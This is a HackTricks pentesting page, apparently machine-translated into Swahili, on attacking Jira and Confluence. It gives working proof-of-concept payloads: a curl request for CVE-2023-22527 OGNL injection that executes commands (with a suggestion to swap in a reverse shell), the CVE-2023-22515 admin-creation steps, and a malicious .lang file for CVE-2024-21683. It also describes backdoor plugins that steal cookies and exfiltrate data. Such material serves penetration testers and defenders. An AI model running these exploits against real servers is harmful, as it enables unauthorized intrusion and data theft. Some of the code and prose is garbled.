HackTricks
Jira & Confluence
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Kagua Ruhusa
Katika Jira, ruhusa zinaweza kukaguliwa na mtumiaji yeyote, aliyethibitishwa au la, kupitia endpoints /rest/api/2/mypermissions au /rest/api/3/mypermissions. Endpoints hizi zinaonyesha ruhusa za mtumiaji kwa sasa. Kitisho muhimu kinapotokea ni wakati watumiaji wasiothibitishwa wana ruhusa, kinachoashiria udhaifu wa usalama unaoweza kuwa na sifa ya kupewa bounty. Vivyo hivyo, ruhusa zisizotarajiwa kwa watumiaji walio thibitishwa pia zinaonyesha udhaifu.
Marekebisho muhimu yalifanywa mnamo 1 Februari 2019, yakidai endpoint ya ‘mypermissions’ kujumuisha parameta ya ‘permission’. Hitaji hili linalenga kuboresha usalama kwa kubainisha ruhusa zinazoulizwa: check it here
- ADD_COMMENTS
- ADMINISTER
- ADMINISTER_PROJECTS
- ASSIGNABLE_USER
- ASSIGN_ISSUES
- BROWSE_PROJECTS
- BULK_CHANGE
- CLOSE_ISSUES
- CREATE_ATTACHMENTS
- CREATE_ISSUES
- CREATE_PROJECT
- CREATE_SHARED_OBJECTS
- DELETE_ALL_ATTACHMENTS
- DELETE_ALL_COMMENTS
- DELETE_ALL_WORKLOGS
- DELETE_ISSUES
- DELETE_OWN_ATTACHMENTS
- DELETE_OWN_COMMENTS
- DELETE_OWN_WORKLOGS
- EDIT_ALL_COMMENTS
- EDIT_ALL_WORKLOGS
- EDIT_ISSUES
- EDIT_OWN_COMMENTS
- EDIT_OWN_WORKLOGS
- LINK_ISSUES
- MANAGE_GROUP_FILTER_SUBSCRIPTIONS
- MANAGE_SPRINTS_PERMISSION
- MANAGE_WATCHERS
- MODIFY_REPORTER
- MOVE_ISSUES
- RESOLVE_ISSUES
- SCHEDULE_ISSUES
- SET_ISSUE_SECURITY
- SYSTEM_ADMIN
- TRANSITION_ISSUES
- USER_PICKER
- VIEW_AGGREGATED_DATA
- VIEW_DEV_TOOLS
- VIEW_READONLY_WORKFLOW
- VIEW_VOTERS_AND_WATCHERS
- WORK_ON_ISSUES
Mfano: https://your-domain.atlassian.net/rest/api/2/mypermissions?permissions=BROWSE_PROJECTS,CREATE_ISSUES,ADMINISTER_PROJECTS
#Check non-authenticated privileges
curl https://jira.some.example.com/rest/api/2/mypermissions | jq | grep -iB6 '"havePermission": true'
Uorodheshaji wa otomatiki
RCE za hivi karibuni & vidokezo vya vitendo vya exploit (Confluence)
CVE-2023-22527 – unauthenticated template/OGNL injection (10.0)
- Inaathiri Confluence Data Center/Server 8.0.x–8.5.3 & 8.4.5. Velocity template iliyo na udhaifu
text-inline.vminaruhusu OGNL evaluation bila authentication. - PoC fupi (amri inaendeshwa kama mtumiaji wa Confluence):
curl -k -X POST "https://confluence.target.com/template/aui/text-inline.vm" \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'label=aaa%27%2b#request.get("KEY_velocity.struts2.context").internalGet("ognl").findValue(#parameters.poc[0],{})%2b%27&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader("x-cmd",(new+freemarker.template.utility.Execute()).exec({"id"}))'
- Response header
x-cmditakuwa na matokeo ya amri. Badilishaidkwa reverse shell payload. - Skana: nuclei template
http/cves/2023/CVE-2023-22527.yaml(inapatikana katika nuclei-templates ≥9.7.5).
CVE-2023-22515 – kurejesha setup na kuunda admin (auth bypass)
- Confluence Data Center/Server 8.0.0–8.5.1 inayofikika kwa umma inaruhusu kubadili
setupCompletena kuendesha tena/setup/setupadministrator.actionili kuunda akaunti mpya ya admin. - Mtiririko mfupi wa exploit:
GET /server-info.action(bila uthibitisho) ili kuhakikisha inafikika.POST /server-info.actionna parameta zabuildNumberili kubadili bendera ya setup.POST /setup/setupadministrator.actionnafullName,email,username,password,confirmili kuunda admin.
CVE-2024-21683 – authenticated RCE kupitia upload ya Code Macro
- Confluence Admin anaweza kupakia definition ya lugha iliyotengenezwa ndani ya Configure Code Macro; engine ya Rhino inatekeleza Java iliyowekwa ndani, ikisababisha RCE.
- Kwa shell, pakia faili ya
.langyenye payload kama:
<?xml version="1.0"?>
<languages>
<language key="pwn" name="pwn" namespace="java.lang">
<tokens>
<token scope="normal">${"".getClass().forName("java.lang.Runtime").getRuntime().exec("id")}</token>
</tokens>
</language>
</languages>
- Sababisha kwa kuchagua lugha hatarishi katika yaliyomo ya Code Macro yoyote. Metasploit module
exploit/multi/http/atlassian_confluence_rce_cve_2024_21683inautomatisha auth + upload + exec.
Atlasian Plugins
Kama ilivyoonyeshwa katika hii blog, katika nyaraka kuhusu Plugin modules ↗ inawezekana kuangalia aina tofauti za plugins, kama:
- REST Plugin Module ↗: Kutoa endpoints za RESTful API
- Servlet Plugin Module ↗: Weka Java servlets kama sehemu ya plugin
- Macro Plugin Module ↗: Tekeleza Confluence Macros, yaani templates za HTML zilizo na vigezo
This is an example of the macro plugin type:
Mfano wa plugin ya macro
```java package com.atlassian.tutorial.macro;import com.atlassian.confluence.content.render.xhtml.ConversionContext; import com.atlassian.confluence.macro.Macro; import com.atlassian.confluence.macro.MacroExecutionException;
import java.util.Map;
public class helloworld implements Macro {
public String execute(Map<String, String> map, String body, ConversionContext conversionContext) throws MacroExecutionException { if (map.get(“Name”) != null) { return (“
Hello “ + map.get(“Name”) + “!
”); } else { return “Hello World!
”;
}
}
public BodyType getBodyType() { return BodyType.NONE; }
public OutputType getOutputType() { return OutputType.BLOCK; } }
</details>
Inawezekana kuona kwamba plugin hizi zinaweza kuwa zilizo hatarini kwa udhaifu za kawaida za wavuti kama XSS. Kwa mfano, mfano uliotangulia una udhaifu kwa sababu unarudisha data iliyotolewa na mtumiaji.
Mara XSS inapopatikana, katika [**this github repo**](https://github.com/cyllective/XSS-Payloads/tree/main/Confluence) unaweza kupata baadhi ya payloads ili kuongeza athari za XSS.
## Backdoor Plugin
[**This post**](https://cyllective.com/blog/posts/atlassian-malicious-plugin) inafafanua vitendo mbalimbali (vya kibaya) ambavyo plugin ya Jira yenye madhuni inaweza kufanya. Unaweza kupata [**code example in this repo**](https://github.com/cyllective/malfluence).
Hizi ni baadhi ya vitendo ambavyo plugin yenye madhuni inaweza kufanya:
- **Hiding Plugins from Admins**: Inawezekana kuficha plugin yenye madhuni kwa kuingiza front-end javascript.
- **Exfiltrating Attachments and Pages**: Inaruhusu kupata na exfiltrate data yote.
- **Stealing Session Tokens**: Ongeza endpoint itakayorudisha headers katika response (with the cookie) na javascript itakayowasiliana nayo na leak the cookies.
- **Command Execution**: Ndiyo, inawezekana kuunda plugin itakayotekeleza code.
- **Reverse Shell**: Au kupata reverse shell.
- **DOM Proxying**: Ikiwa Confluence iko ndani ya mtandao wa kibinafsi, itakuwa inawezekana kuanzisha muunganisho kupitia browser ya mtumiaji mwenye ufikiaji na, kwa mfano, kuwasiliana na server na kutekeleza amri kupitia yake.
## References
- [Atlassian advisory – CVE-2023-22527 template injection RCE](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-datacenter-and-confluence-server-1333990257.html)
- [CISA AA23-289A – Active exploitation of Confluence CVE-2023-22515](https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-289a)
> [!TIP]
> Jifunze na fanya mazoezi ya AWS Hacking:<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../../../images/arte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">\
> Jifunze na fanya mazoezi ya GCP Hacking: <img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)<img src="../../../../../images/grte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
> Jifunze na fanya mazoezi ya Azure Hacking: <img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">[**HackTricks Training Azure Red Team Expert (AzRTE)**](https://training.hacktricks.xyz/courses/azrte)<img src="../../../../../images/azrte.png" alt="" style="width:auto;height:24px;vertical-align:middle;">
>
> <details>
>
> <summary>Support HackTricks</summary>
>
> - Angalia [**mpango wa usajili**](https://github.com/sponsors/carlospolop)!
> - **Jiunge na** 💬 [**kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuatilie** kwenye **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
> - **Shiriki mbinu za hacking kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
>
> </details>